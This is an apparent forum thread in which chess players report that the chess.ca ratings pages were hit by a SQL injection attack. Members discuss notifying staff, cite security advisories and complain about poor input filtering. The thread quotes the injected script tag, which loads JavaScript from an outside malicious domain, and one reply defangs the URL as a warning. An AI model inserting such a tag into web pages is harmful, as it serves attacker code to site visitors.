I suspect that the chess.ca was corrupted again. Webpages with an information about players' ratings tries to execute a script

<script src=http://f1y.in/j.js></script>

Who is responsible to overlook the webpage? ED?

I suspect that the chess.ca was corrupted again. Webpages with an information about players' ratings tries to execute a script

<script src=http://f1y.in/j.js></script>

Who is responsible to overlook the webpage? ED?

I would send an email to the ED! If they're not aware of the problem, how can they fix it.

I checked my rating, and I did not encounter any problems (other than it's too low LOL), but I forwarded your message to Gerry at info@chess.ca anyway to be safe.

Hi Bob,

This office is aware of the issue - Eric had already sent a note to Gerry on this.

It is the result of a SQL injection attack. Here's a little information about it:

http://blog.trendmicro.com/massive-sql-injection-ensues/
http://isc.sans.org/diary.html?storyid=6811

Do not click on the link that shows up (hxxp://f1y.in/j.js) as it appears to lead to something nasty (I've deliberately messed up the url replacing http with hxxp to prevent anyone from accidentally clicking on the link).

Ideally all web form data (like where you enter your surname to get your rating) should be filtered to prevent SQL injections. Although by looking at the number of sites that have been hit by this attack, it must be doing something a bit tricky or lots of web sites are being lazy with form filtering.

Although by looking at the number of sites that have been hit by this attack, it must be doing something a bit tricky or lots of web sites are being lazy with form filtering.

This... despite most major systems having built-in code to prevent this, many people don't bother using it, and MUCH worse, quite a few web development books DON'T TELL YOU TO!

I'm not familiar with ASP in particular but usually it's some variation of Escape("string goes here");

damn script kiddies...